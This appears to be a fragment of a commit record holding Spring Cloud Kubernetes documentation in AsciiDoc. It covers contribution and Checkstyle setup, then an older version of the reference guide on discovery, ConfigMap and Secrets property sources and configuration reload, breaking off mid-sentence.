expected to uphold this code. Please report\nunacceptable behavior to spring-code-of-conduct@pivotal.io.\n\n=== Code Conventions and Housekeeping\nNone of these is essential for a pull request, but they will all help. They can also be\nadded after the original pull request but before a merge.\n\n* Use the Spring Framework code format conventions. If you use Eclipse\n you can import formatter settings using the\n `eclipse-code-formatter.xml` file from the\n https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/spring-cloud-dependencies-parent\/eclipse-code-formatter.xml[Spring\n Cloud Build] project. If using IntelliJ, you can use the\n https:\/\/plugins.jetbrains.com\/plugin\/6546[Eclipse Code Formatter\n Plugin] to import the same file.\n* Make sure all new `.java` files to have a simple Javadoc class comment with at least an\n `@author` tag identifying you, and preferably at least a paragraph on what the class is\n for.\n* Add the ASF license header comment to all new `.java` files (copy from existing files\n in the project)\n* Add yourself as an `@author` to the .java files that you modify substantially (more\n than cosmetic changes).\n* Add some Javadocs and, if you change the namespace, some XSD doc elements.\n* A few unit tests would help a lot as well -- someone has to do it.\n* If no-one else is using your branch, please rebase it against the current master (or\n other target branch in the main project).\n* When writing a commit message please follow https:\/\/tbaggery.com\/2008\/04\/19\/a-note-about-git-commit-messages.html[these conventions],\n if you are fixing an existing issue please add `Fixes gh-XXXX` at the end of the commit\n message (where XXXX is the issue number).\n\n=== Checkstyle\n\nSpring Cloud Build comes with a set of checkstyle rules. You can find them in the `spring-cloud-build-tools` module. The most notable files under the module are:\n\n.spring-cloud-build-tools\/\n----\n\u2514\u2500\u2500 src\n \u00a0\u00a0 \u251c\u2500\u2500 checkstyle\n \u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 checkstyle-suppressions.xml <3>\n \u00a0\u00a0 \u2514\u2500\u2500 main\n \u00a0\u00a0 \u2514\u2500\u2500 resources\n \u00a0\u00a0 \u251c\u2500\u2500 checkstyle-header.txt <2>\n \u00a0\u00a0 \u2514\u2500\u2500 checkstyle.xml <1>\n----\n<1> Default Checkstyle rules\n<2> File header setup\n<3> Default suppression rules\n\n==== Checkstyle configuration\n\nCheckstyle rules are *disabled by default*. To add checkstyle to your project just define the following properties and plugins.\n\n.pom.xml\n----\n<properties>\n<maven-checkstyle-plugin.failsOnError>true<\/maven-checkstyle-plugin.failsOnError> <1>\n <maven-checkstyle-plugin.failsOnViolation>true\n <\/maven-checkstyle-plugin.failsOnViolation> <2>\n <maven-checkstyle-plugin.includeTestSourceDirectory>true\n <\/maven-checkstyle-plugin.includeTestSourceDirectory> <3>\n<\/properties>\n\n<build>\n <plugins>\n <plugin> <4>\n <groupId>io.spring.javaformat<\/groupId>\n <artifactId>spring-javaformat-maven-plugin<\/artifactId>\n <\/plugin>\n <plugin> <5>\n <groupId>org.apache.maven.plugins<\/groupId>\n <artifactId>maven-checkstyle-plugin<\/artifactId>\n <\/plugin>\n <\/plugins>\n\n <reporting>\n <plugins>\n <plugin> <5>\n <groupId>org.apache.maven.plugins<\/groupId>\n <artifactId>maven-checkstyle-plugin<\/artifactId>\n <\/plugin>\n <\/plugins>\n <\/reporting>\n<\/build>\n----\n<1> Fails the build upon Checkstyle errors\n<2> Fails the build upon Checkstyle violations\n<3> Checkstyle analyzes also the test sources\n<4> Add the Spring Java Format plugin that will reformat your code to pass most of the Checkstyle formatting rules\n<5> Add checkstyle plugin to your build and reporting phases\n\nIf you need to suppress some rules (e.g. line length needs to be longer), then it's enough for you to define a file under `${project.root}\/src\/checkstyle\/checkstyle-suppressions.xml` with your suppressions. Example:\n\n.projectRoot\/src\/checkstyle\/checkstyle-suppresions.xml\n----\n<?xml version=\"1.0\"?>\n<!DOCTYPE suppressions PUBLIC\n\t\t\"-\/\/Puppy Crawl\/\/DTD Suppressions 1.1\/\/EN\"\n\t\t\"https:\/\/www.puppycrawl.com\/dtds\/suppressions_1_1.dtd\">\n<suppressions>\n\t<suppress files=\".*ConfigServerApplication\\.java\" checks=\"HideUtilityClassConstructor\"\/>\n\t<suppress files=\".*ConfigClientWatch\\.java\" checks=\"LineLengthCheck\"\/>\n<\/suppressions>\n----\n\nIt's advisable to copy the `${spring-cloud-build.rootFolder}\/.editorconfig` and `${spring-cloud-build.rootFolder}\/.springformat` to your project. That way, some default formatting rules will be applied. You can do so by running this script:\n\n```bash\n$ curl https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/.editorconfig -o .editorconfig\n$ touch .springformat\n```\n\n=== IDE setup\n\n==== Intellij IDEA\n\nIn order to setup Intellij you should import our coding conventions, inspection profiles and set up the checkstyle plugin.\nThe following files can be found in the https:\/\/github.com\/spring-cloud\/spring-cloud-build\/tree\/master\/spring-cloud-build-tools[Spring Cloud Build] project.\n\n.spring-cloud-build-tools\/\n----\n\u2514\u2500\u2500 src\n \u00a0\u00a0 \u251c\u2500\u2500 checkstyle\n \u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 checkstyle-suppressions.xml <3>\n \u00a0\u00a0 \u2514\u2500\u2500 main\n \u00a0\u00a0 \u2514\u2500\u2500 resources\n \u00a0\u00a0 \u251c\u2500\u2500 checkstyle-header.txt <2>\n \u00a0\u00a0 \u251c\u2500\u2500 checkstyle.xml <1>\n \u00a0\u00a0 \u2514\u2500\u2500 intellij\n \u00a0\u00a0 \u00a0\u00a0 \u251c\u2500\u2500 Intellij_Project_Defaults.xml <4>\n \u00a0\u00a0 \u00a0\u00a0 \u2514\u2500\u2500 Intellij_Spring_Boot_Java_Conventions.xml <5>\n----\n<1> Default Checkstyle rules\n<2> File header setup\n<3> Default suppression rules\n<4> Project defaults for Intellij that apply most of Checkstyle rules\n<5> Project style conventions for Intellij that apply most of Checkstyle rules\n\n.Code style\n\nimage::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/{spring-cloud-build-branch}\/docs\/src\/main\/asciidoc\/images\/intellij-code-style.png[Code style]\n\nGo to `File` -> `Settings` -> `Editor` -> `Code style`. There click on the icon next to the `Scheme` section. There, click on the `Import Scheme` value and pick the `Intellij IDEA code style XML` option. Import the `spring-cloud-build-tools\/src\/main\/resources\/intellij\/Intellij_Spring_Boot_Java_Conventions.xml` file.\n\n.Inspection profiles\n\nimage::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/{spring-cloud-build-branch}\/docs\/src\/main\/asciidoc\/images\/intellij-inspections.png[Code style]\n\nGo to `File` -> `Settings` -> `Editor` -> `Inspections`. There click on the icon next to the `Profile` section. There, click on the `Import Profile` and import the `spring-cloud-build-tools\/src\/main\/resources\/intellij\/Intellij_Project_Defaults.xml` file.\n\n.Checkstyle\n\nTo have Intellij work with Checkstyle, you have to install the `Checkstyle` plugin. It's advisable to also install the `Assertions2Assertj` to automatically convert the JUnit assertions\n\nimage::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/{spring-cloud-build-branch}\/docs\/src\/main\/asciidoc\/images\/intellij-checkstyle.png[Checkstyle]\n\nGo to `File` -> `Settings` -> `Other settings` -> `Checkstyle`. There click on the `+` icon in the `Configuration file` section. There, you'll have to define where the checkstyle rules should be picked from. In the image above, we've picked the rules from the cloned Spring Cloud Build repository. However, you can point to the Spring Cloud Build's GitHub repository (e.g. for the `checkstyle.xml` : `https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/spring-cloud-build-tools\/src\/main\/resources\/checkstyle.xml`). We need to provide the following variables:\n\n- `checkstyle.header.file` - please point it to the Spring Cloud Build's, `spring-cloud-build-tools\/src\/main\/resources\/checkstyle-header.txt` file either in your cloned repo or via the `https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/spring-cloud-build-tools\/src\/main\/resources\/checkstyle-header.txt` URL.\n- `checkstyle.suppressions.file` - default suppressions. Please point it to the Spring Cloud Build's, `spring-cloud-build-tools\/src\/checkstyle\/checkstyle-suppressions.xml` file either in your cloned repo or via the `https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/spring-cloud-build-tools\/src\/checkstyle\/checkstyle-suppressions.xml` URL.\n- `checkstyle.additional.suppressions.file` - this variable corresponds to suppressions in your local project. E.g. you're working on `spring-cloud-contract`. Then point to the `project-root\/src\/checkstyle\/checkstyle-suppressions.xml` folder. Example for `spring-cloud-contract` would be: `\/home\/username\/spring-cloud-contract\/src\/checkstyle\/checkstyle-suppressions.xml`.\n\nIMPORTANT: Remember to set the `Scan Scope` to `All sources` since we apply checkstyle rules for production and test sources.\n","old_contents":"\/\/\/\/\nDO NOT EDIT THIS FILE. IT WAS GENERATED.\nManual changes to this file will be lost when it is generated again.\nEdit the files in the src\/main\/asciidoc\/ directory instead.\n\/\/\/\/\n\n\n= Spring Cloud Kubernetes\n:doctype: book\n:idprefix:\n:idseparator: -\n:toc: left\n:toclevels: 4\n:tabsize: 4\n:numbered:\n:sectanchors:\n:sectnums:\n:icons: font\n:hide-uri-scheme:\n:docinfo: shared,private\n\n:sc-ext: java\n:project-full-name: Spring Cloud Kubernetes\n:all: {asterisk}{asterisk}\n\nThis reference guide covers how to use Spring Cloud Kubernetes.\n\n== Why do you need Spring Cloud Kubernetes?\n\nSpring Cloud Kubernetes provides implementations of well known Spring Cloud interfaces allowing developers to build and run Spring Cloud applications on Kubernetes. While this project may be useful to you when building a cloud native application, it is also not a requirement in order to deploy a Spring Boot app on Kubernetes. If you are just getting started in your journey to running your Spring Boot app on Kubernetes you can accomplish a lot with nothing more than a basic Spring Boot app and Kubernetes itself. To learn more, you can get started by reading the https:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/htmlsingle\/#cloud-deployment-kubernetes[Spring Boot reference documentation for deploying to Kubernetes ] and also working through the workshop material https:\/\/hackmd.io\/@ryanjbaxter\/spring-on-k8s-workshop[Spring and Kubernetes].\n\n== Starters\n\nStarters are convenient dependency descriptors you can include in your\napplication. Include a starter to get the dependencies and Spring Boot\nauto-configuration for a feature set.\n\n[cols=\"a,d\"]\n|===\n| Starter | Features\n\n| [source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes<\/artifactId>\n<\/dependency>\n----\n| <<DiscoveryClient for Kubernetes,Discovery Client>> implementation that\nresolves service names to Kubernetes Services.\n\n| [source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-config<\/artifactId>\n<\/dependency>\n----\n| Load application properties from Kubernetes\n<<configmap-propertysource,ConfigMaps>> and <<Secrets PropertySource,Secrets>>.\n<<propertysource-reload,Reload>> application properties when a ConfigMap or\nSecret changes.\n\n| [source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-all<\/artifactId>\n<\/dependency>\n----\n| All Spring Cloud Kubernetes features.\n\n|===\n\n== DiscoveryClient for Kubernetes\n\nThis project provides an implementation of https:\/\/github.com\/spring-cloud\/spring-cloud-commons\/blob\/master\/spring-cloud-commons\/src\/main\/java\/org\/springframework\/cloud\/client\/discovery\/DiscoveryClient.java[Discovery Client]\nfor https:\/\/kubernetes.io[Kubernetes].\nThis client lets you query Kubernetes endpoints (see https:\/\/kubernetes.io\/docs\/user-guide\/services\/[services]) by name.\nA service is typically exposed by the Kubernetes API server as a collection of endpoints that represent `http` and `https` addresses and that a client can\naccess from a Spring Boot application running as a pod.\n\nThis is something that you get for free by adding the following dependency inside your project:\n\n====\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes<\/artifactId>\n<\/dependency>\n----\n====\n\nTo enable loading of the `DiscoveryClient`, add `@EnableDiscoveryClient` to the according configuration or application class, as the following example shows:\n\n====\n[source,java]\n----\n@SpringBootApplication\n@EnableDiscoveryClient\npublic class Application {\n public static void main(String[] args) {\n SpringApplication.run(Application.class, args);\n }\n}\n----\n====\n\nThen you can inject the client in your code simply by autowiring it, as the following example shows:\n\n====\n[source,java]\n----\n@Autowired\nprivate DiscoveryClient discoveryClient;\n----\n====\n\nYou can choose to enable `DiscoveryClient` from all namespaces by setting the following property in `application.properties`:\n\n====\n[source]\n----\nspring.cloud.kubernetes.discovery.all-namespaces=true\n----\n====\n\nIf, for any reason, you need to disable the `DiscoveryClient`, you can set the following property in `application.properties`:\n\n====\n[source]\n----\nspring.cloud.kubernetes.discovery.enabled=false\n----\n====\n\nSome Spring Cloud components use the `DiscoveryClient` in order to obtain information about the local service instance. For\nthis to work, you need to align the Kubernetes service name with the `spring.application.name` property.\n\nNOTE: `spring.application.name` has no effect as far as the name registered for the application within Kubernetes\n\nSpring Cloud Kubernetes can also watch the Kubernetes service catalog for changes and update the\n`DiscoveryClient` implementation accordingly. In order to enable this functionality you need to add\n`@EnableScheduling` on a configuration class in your application.\n\n== Kubernetes native service discovery\n\nKubernetes itself is capable of (server side) service discovery (see: https:\/\/kubernetes.io\/docs\/concepts\/services-networking\/service\/#discovering-services).\nUsing native kubernetes service discovery ensures compatibility with additional tooling, such as Istio (https:\/\/istio.io), a service mesh that is capable of load balancing, circuit breaker, failover, and much more.\n\nThe caller service then need only refer to names resolvable in a particular Kubernetes cluster. A simple implementation might use a spring `RestTemplate` that refers to a fully qualified domain name (FQDN), such as `https:\/\/{service-name}.{namespace}.svc.{cluster}.local:{service-port}`.\n\nAdditionally, you can use Hystrix for:\n\n* Circuit breaker implementation on the caller side, by annotating the spring boot application class with `@EnableCircuitBreaker`\n* Fallback functionality, by annotating the respective method with `@HystrixCommand(fallbackMethod=`\n\n== Kubernetes PropertySource implementations\n\nThe most common approach to configuring your Spring Boot application is to create an `application.properties` or `application.yaml` or\nan `application-profile.properties` or `application-profile.yaml` file that contains key-value pairs that provide customization values to your\napplication or Spring Boot starters. You can override these properties by specifying system properties or environment\nvariables.\n\n[[configmap-propertysource]]\n=== Using a `ConfigMap` `PropertySource`\n\nKubernetes provides a resource named https:\/\/kubernetes.io\/docs\/user-guide\/configmap\/[`ConfigMap`] to externalize the\nparameters to pass to your application in the form of key-value pairs or embedded `application.properties` or `application.yaml` files.\nThe link:.\/spring-cloud-kubernetes-config[Spring Cloud Kubernetes Config] project makes Kubernetes `ConfigMap` instances available\nduring application bootstrapping and triggers hot reloading of beans or Spring context when changes are detected on\nobserved `ConfigMap` instances.\n\nThe default behavior is to create a `Fabric8ConfigMapPropertySource` based on a Kubernetes `ConfigMap` that has a `metadata.name` value of either the name of\nyour Spring application (as defined by its `spring.application.name` property) or a custom name defined within the\n`bootstrap.properties` file under the following key: `spring.cloud.kubernetes.config.name`.\n\nHowever, more advanced configuration is possible where you can use multiple `ConfigMap` instances.\nThe `spring.cloud.kubernetes.config.sources` list makes this possible.\nFor example, you could define the following `ConfigMap` instances:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: cloud-k8s-app\n cloud:\n kubernetes:\n config:\n name: default-name\n namespace: default-namespace\n sources:\n # Spring Cloud Kubernetes looks up a ConfigMap named c1 in namespace default-namespace\n - name: c1\n # Spring Cloud Kubernetes looks up a ConfigMap named default-name in whatever namespace n2\n - namespace: n2\n # Spring Cloud Kubernetes looks up a ConfigMap named c3 in namespace n3\n - namespace: n3\n name: c3\n----\n====\n\nIn the preceding example, if `spring.cloud.kubernetes.config.namespace` had not been set,\nthe `ConfigMap` named `c1` would be looked up in the namespace that the application runs.\n\nAny matching `ConfigMap` that is found is processed as follows:\n\n* Apply individual configuration properties.\n* Apply as `yaml` the content of any property named `application.yaml`.\n* Apply as a properties file the content of any property named `application.properties`.\n\nThe single exception to the aforementioned flow is when the `ConfigMap` contains a *single* key that indicates\nthe file is a YAML or properties file. In that case, the name of the key does NOT have to be `application.yaml` or\n`application.properties` (it can be anything) and the value of the property is treated correctly.\nThis features facilitates the use case where the `ConfigMap` was created by using something like the following:\n\n====\n[source]\n----\nkubectl create configmap game-config --from-file=\/path\/to\/app-config.yaml\n----\n====\n\nAssume that we have a Spring Boot application named `demo` that uses the following properties to read its thread pool\nconfiguration.\n\n* `pool.size.core`\n* `pool.size.maximum`\n\nThis can be externalized to config map in `yaml` format as follows:\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo\ndata:\n pool.size.core: 1\n pool.size.max: 16\n----\n====\n\nIndividual properties work fine for most cases. However, sometimes, embedded `yaml` is more convenient. In this case, we\nuse a single property named `application.yaml` to embed our `yaml`, as follows:\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo\ndata:\n application.yaml: |-\n pool:\n size:\n core: 1\n max:16\n----\n====\n\nThe following example also works:\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo\ndata:\n custom-name.yaml: |-\n pool:\n size:\n core: 1\n max:16\n----\n====\n\nYou can also configure Spring Boot applications differently depending on active profiles that are merged together\nwhen the `ConfigMap` is read. You can provide different property values for different profiles by using an\n`application.properties` or `application.yaml` property, specifying profile-specific values, each in their own document\n(indicated by the `---` sequence), as follows:\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo\ndata:\n application.yml: |-\n greeting:\n message: Say Hello to the World\n farewell:\n message: Say Goodbye\n ---\n spring:\n profiles: development\n greeting:\n message: Say Hello to the Developers\n farewell:\n message: Say Goodbye to the Developers\n ---\n spring:\n profiles: production\n greeting:\n message: Say Hello to the Ops\n----\n====\n\nIn the preceding case, the configuration loaded into your Spring Application with the `development` profile is as follows:\n\n====\n[source,yaml]\n----\n greeting:\n message: Say Hello to the Developers\n farewell:\n message: Say Goodbye to the Developers\n----\n====\n\nHowever, if the `production` profile is active, the configuration becomes:\n\n====\n[source,yaml]\n----\n greeting:\n message: Say Hello to the Ops\n farewell:\n message: Say Goodbye\n----\n====\n\nIf both profiles are active, the property that appears last within the `ConfigMap` overwrites any preceding values.\n\nAnother option is to create a different config map per profile and spring boot will automatically fetch it based\non active profiles\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo\ndata:\n application.yml: |-\n greeting:\n message: Say Hello to the World\n farewell:\n message: Say Goodbye\n----\n====\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo-development\ndata:\n application.yml: |-\n spring:\n profiles: development\n greeting:\n message: Say Hello to the Developers\n farewell:\n message: Say Goodbye to the Developers\n----\n====\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: demo-production\ndata:\n application.yml: |-\n spring:\n profiles: production\n greeting:\n message: Say Hello to the Ops\n farewell:\n message: Say Goodbye\n----\n====\n\n\nTo tell Spring Boot which `profile` should be enabled at bootstrap, you can pass `SPRING_PROFILES_ACTIVE` environment variable.\n To do so, you can launch your Spring Boot application with an environment variable that you can define it in the PodSpec at the container specification.\n Deployment resource file, as follows:\n\n====\n[source,yaml]\n----\napiVersion: apps\/v1\nkind: Deployment\nmetadata:\n name: deployment-name\n labels:\n app: deployment-name\nspec:\n replicas: 1\n selector:\n matchLabels:\n app: deployment-name\n template:\n metadata:\n labels:\n app: deployment-name\n spec:\n containers:\n - name: container-name\n image: your-image\n env:\n - name: SPRING_PROFILES_ACTIVE\n value: \"development\"\n----\n====\n\nNOTE: You should check the security configuration section. To access config maps from inside a pod you need to have the correct\nKubernetes service accounts, roles and role bindings.\n\nAnother option for using `ConfigMap` instances is to mount them into the Pod by running the Spring Cloud Kubernetes application\nand having Spring Cloud Kubernetes read them from the file system.\nThis behavior is controlled by the `spring.cloud.kubernetes.config.paths` property. You can use it in\naddition to or instead of the mechanism described earlier.\nYou can specify multiple (exact) file paths in `spring.cloud.kubernetes.config.paths` by using the `,` delimiter.\n\nNOTE: You have to provide the full exact path to each property file, because directories are not being recursively parsed.\n\nNOTE: If you use `spring.cloud.kubernetes.config.paths` or `spring.cloud.kubernetes.secrets.path` the automatic reload\nfunctionality will not work. You will need to make a `POST` request to the `\/actuator\/refresh` endpoint or\nrestart\/redeploy the application.\n\n.Properties:\n[options=\"header,footer\"]\n|===\n| Name | Type | Default | Description\n| `spring.cloud.kubernetes.config.enabled` | `Boolean` | `true` | Enable ConfigMaps `PropertySource`\n| `spring.cloud.kubernetes.config.name` | `String` | `${spring.application.name}` | Sets the name of `ConfigMap` to look up\n| `spring.cloud.kubernetes.config.namespace` | `String` | Client namespace | Sets the Kubernetes namespace where to lookup\n| `spring.cloud.kubernetes.config.paths` | `List` | `null` | Sets the paths where `ConfigMap` instances are mounted\n| `spring.cloud.kubernetes.config.enableApi` | `Boolean` | `true` | Enable or disable consuming `ConfigMap` instances through APIs\n|===\n\n=== Secrets PropertySource\n\nKubernetes has the notion of https:\/\/kubernetes.io\/docs\/concepts\/configuration\/secret\/[Secrets] for storing\nsensitive data such as passwords, OAuth tokens, and so on. This project provides integration with `Secrets` to make secrets\naccessible by Spring Boot applications. You can explicitly enable or disable This feature by setting the `spring.cloud.kubernetes.secrets.enabled` property.\n\nWhen enabled, the `Fabric8SecretsPropertySource` looks up Kubernetes for `Secrets` from the following sources:\n\n. Reading recursively from secrets mounts\n. Named after the application (as defined by `spring.application.name`)\n. Matching some labels\n\n*Note:*\n\nBy default, consuming Secrets through the API (points 2 and 3 above) *is not enabled* for security reasons. The permission 'list' on secrets allows clients to inspect secrets values in the specified namespace.\nFurther, we recommend that containers share secrets through mounted volumes.\n\nIf you enable consuming Secrets through the API, we recommend that you limit access to Secrets by using an authorization policy, such as RBAC.\nFor more information about risks and best practices when consuming Secrets through the API refer to https:\/\/kubernetes.io\/docs\/concepts\/configuration\/secret\/#best-practices[this doc].\n\nIf the secrets are found, their data is made available to the application.\n\nAssume that we have a spring boot application named `demo` that uses properties to read its database\nconfiguration. We can create a Kubernetes secret by using the following command:\n\n====\n[source]\n----\nkubectl create secret generic db-secret --from-literal=username=user --from-literal=password=p455w0rd\n----\n====\n\nThe preceding command would create the following secret (which you can see by using `kubectl get secrets db-secret -o yaml`):\n\n====\n[source,yaml]\n----\napiVersion: v1\ndata:\n password: cDQ1NXcwcmQ=\n username: dXNlcg==\nkind: Secret\nmetadata:\n creationTimestamp: 2017-07-04T09:15:57Z\n name: db-secret\n namespace: default\n resourceVersion: \"357496\"\n selfLink: \/api\/v1\/namespaces\/default\/secrets\/db-secret\n uid: 63c89263-6099-11e7-b3da-76d6186905a8\ntype: Opaque\n----\n====\n\nNote that the data contains Base64-encoded versions of the literal provided by the `create` command.\n\nYour application can then use this secret -- for example, by exporting the secret's value as environment variables:\n\n====\n[source,yaml]\n----\napiVersion: v1\nkind: Deployment\nmetadata:\n name: ${project.artifactId}\nspec:\n template:\n spec:\n containers:\n - env:\n - name: DB_USERNAME\n valueFrom:\n secretKeyRef:\n name: db-secret\n key: username\n - name: DB_PASSWORD\n valueFrom:\n secretKeyRef:\n name: db-secret\n key: password\n----\n====\n\nYou can select the Secrets to consume in a number of ways:\n\n. By listing the directories where secrets are mapped:\n+\n====\n[source,bash]\n----\n-Dspring.cloud.kubernetes.secrets.paths=\/etc\/secrets\/db-secret,etc\/secrets\/postgresql\n----\n====\n+\nIf you have all the secrets mapped to a common root, you can set them like:\n+\n====\n[source,bash]\n----\n-Dspring.cloud.kubernetes.secrets.paths=\/etc\/secrets\n----\n====\n\n. By setting a named secret:\n+\n====\n[source,bash]\n----\n-Dspring.cloud.kubernetes.secrets.name=db-secret\n----\n====\n\n. By defining a list of labels:\n+\n====\n[source,bash]\n----\n-Dspring.cloud.kubernetes.secrets.labels.broker=activemq\n-Dspring.cloud.kubernetes.secrets.labels.db=postgresql\n----\n====\n\nAs the case with `ConfigMap`, more advanced configuration is also possible where you can use multiple `Secret`\ninstances. The `spring.cloud.kubernetes.secrets.sources` list makes this possible.\nFor example, you could define the following `Secret` instances:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: cloud-k8s-app\n cloud:\n kubernetes:\n secrets:\n name: default-name\n namespace: default-namespace\n sources:\n # Spring Cloud Kubernetes looks up a Secret named s1 in namespace default-namespace\n - name: s1\n # Spring Cloud Kubernetes looks up a Secret named default-name in whatever namespace n2\n - namespace: n2\n # Spring Cloud Kubernetes looks up a Secret named s3 in namespace n3\n - namespace: n3\n name: s3\n----\n====\n\nIn the preceding example, if `spring.cloud.kubernetes.secrets.namespace` had not been set,\nthe `Secret` named `s1` would be looked up in the namespace that the application runs.\n\n\n.Properties:\n[options=\"header,footer\"]\n|===\n| Name | Type | Default | Description\n| `spring.cloud.kubernetes.secrets.enabled` | `Boolean` | `true` | Enable Secrets `PropertySource`\n| `spring.cloud.kubernetes.secrets.name` | `String` | `${spring.application.name}` | Sets the name of the secret to look up\n| `spring.cloud.kubernetes.secrets.namespace` | `String` | Client namespace | Sets the Kubernetes namespace where to look up\n| `spring.cloud.kubernetes.secrets.labels` | `Map` | `null` | Sets the labels used to lookup secrets\n| `spring.cloud.kubernetes.secrets.paths` | `List` | `null` | Sets the paths where secrets are mounted (example 1)\n| `spring.cloud.kubernetes.secrets.enableApi` | `Boolean` | `false` | Enables or disables consuming secrets through APIs (examples 2 and 3)\n|===\n\nNotes:\n\n* The `spring.cloud.kubernetes.secrets.labels` property behaves as defined by\nhttps:\/\/github.com\/spring-projects\/spring-boot\/wiki\/Spring-Boot-Configuration-Binding#map-based-binding[Map-based binding].\n* The `spring.cloud.kubernetes.secrets.paths` property behaves as defined by\nhttps:\/\/github.com\/spring-projects\/spring-boot\/wiki\/Spring-Boot-Configuration-Binding#collection-based-binding[Collection-based binding].\n* Access to secrets through the API may be restricted for security reasons. The preferred way is to mount secrets to the Pod.\n\nYou can find an example of an application that uses secrets (though it has not been updated to use the new `spring-cloud-kubernetes` project) at\nhttps:\/\/github.com\/fabric8-quickstarts\/spring-boot-camel-config[spring-boot-camel-config]\n\n=== `PropertySource` Reload\n\nWARNING: This functionality has been deprecated in the 2020.0 release. Please see\nthe <<spring-cloud-kubernetes-configuration-watcher>> controller for an alternative way\nto achieve the same functionality.\n\nSome applications may need to detect changes on external property sources and update their internal status to reflect the new configuration.\nThe reload feature of Spring Cloud Kubernetes is able to trigger an application reload when a related `ConfigMap` or\n`Secret` changes.\n\nBy default, this feature is disabled. You can enable it by using the `spring.cloud.kubernetes.reload.enabled=true` configuration property (for example, in the `application.properties` file).\n\nThe following levels of reload are supported (by setting the `spring.cloud.kubernetes.reload.strategy` property):\n\n* `refresh` (default): Only configuration beans annotated with `@ConfigurationProperties` or `@RefreshScope` are reloaded.\nThis reload level leverages the refresh feature of Spring Cloud Context.\n\n* `restart_context`: the whole Spring `ApplicationContext` is gracefully restarted. Beans are recreated with the new configuration.\nIn order for the restart context functionality to work properly you must enable and expose the restart actuator endpoint\n[source,yaml]\n====\n----\nmanagement:\n endpoint:\n restart:\n enabled: true\n endpoints:\n web:\n exposure:\n include: restart\n----\n====\n\n* `shutdown`: the Spring `ApplicationContext` is shut down to activate a restart of the container.\n When you use this level, make sure that the lifecycle of all non-daemon threads is bound to the `ApplicationContext`\nand that a replication controller or replica set is configured to restart the pod.\n\nAssuming that the reload feature is enabled with default settings (`refresh` mode), the following bean is refreshed when the config map changes:\n\n====\n[java, source]\n----\n@Configuration\n@ConfigurationProperties(prefix = \"bean\")\npublic class MyConfig {\n\n private String message = \"a message that can be changed live\";\n\n \/\/ getter and setters\n\n}\n----\n====\n\nTo see that changes effectively happen, you can create another bean that prints the message periodically, as follows\n\n====\n[source,java]\n----\n@Component\npublic class MyBean {\n\n @Autowired\n private MyConfig config;\n\n @Scheduled(fixedDelay = 5000)\n public void hello() {\n System.out.println(\"The message is: \" + config.getMessage());\n }\n}\n----\n====\n\nYou can change the message printed by the application by using a `ConfigMap`, as follows:\n\n====\n[source,yaml]\n----\napiVersion: v1\nkind: ConfigMap\nmetadata:\n name: reload-example\ndata:\n application.properties: |-\n bean.message=Hello World!\n----\n====\n\nAny change to the property named `bean.message` in the `ConfigMap` associated with the pod is reflected in the\noutput. More generally speaking, changes associated to properties prefixed with the value defined by the `prefix`\nfield of the `@ConfigurationProperties` annotation are detected and reflected in the application.\n<<configmap-propertysource,Associating a `ConfigMap` with a pod>> is explained earlier in this chapter.\n\nThe full example is available in https:\/\/github.com\/fabric8io\/spring-cloud-kubernetes\/tree\/master\/spring-cloud-kubernetes-examples\/kubernetes-reload-example[`spring-cloud-kubernetes-reload-example`].\n\nThe reload feature supports two operating modes:\n* Event (default): Watches for changes in config maps or secrets by using the Kubernetes API (web socket).\nAny event produces a re-check on the configuration and, in case of changes, a reload.\nThe `view` role on the service account is required in order to listen for config map changes. A higher level role (such as `edit`) is required for secrets\n(by default, secrets are not monitored).\n* Polling: Periodically re-creates the configuration from config maps and secrets to see if it has changed.\nYou can configure the polling period by using the `spring.cloud.kubernetes.reload.period` property and defaults to 15 seconds.\nIt requires the same role as the monitored property source.\nThis means, for example, that using polling on file-mounted secret sources does not require particular privileges.\n\n.Properties:\n[options=\"header,footer\"]\n|===\n| Name | Type | Default | Description\n| `spring.cloud.kubernetes.reload.enabled` | `Boolean` | `false` | Enables monitoring of property sources and configuration reload\n| `spring.cloud.kubernetes.reload.monitoring-config-maps` | `Boolean` | `true` | Allow monitoring changes in config maps\n| `spring.cloud.kubernetes.reload.monitoring-secrets` | `Boolean` | `false` | Allow monitoring changes in secrets\n| `spring.cloud.kubernetes.reload.strategy` | `Enum` | `refresh` | The strategy to use when firing a reload (`refresh`, `restart_context`, or `shutdown`)\n| `spring.cloud.kubernetes.reload.mode` | `Enum` | `event` | Specifies how to listen for changes in property sources (`event` or `polling`)\n| `spring.cloud.kubernetes.reload.period` | `Duration`| `15s` | The period for verifying changes when using the `polling` strategy\n|===\n\nNotes:\n* You should not use properties under `spring.cloud.kubernetes.reload` in config maps or secrets. Changing such properties at runtime 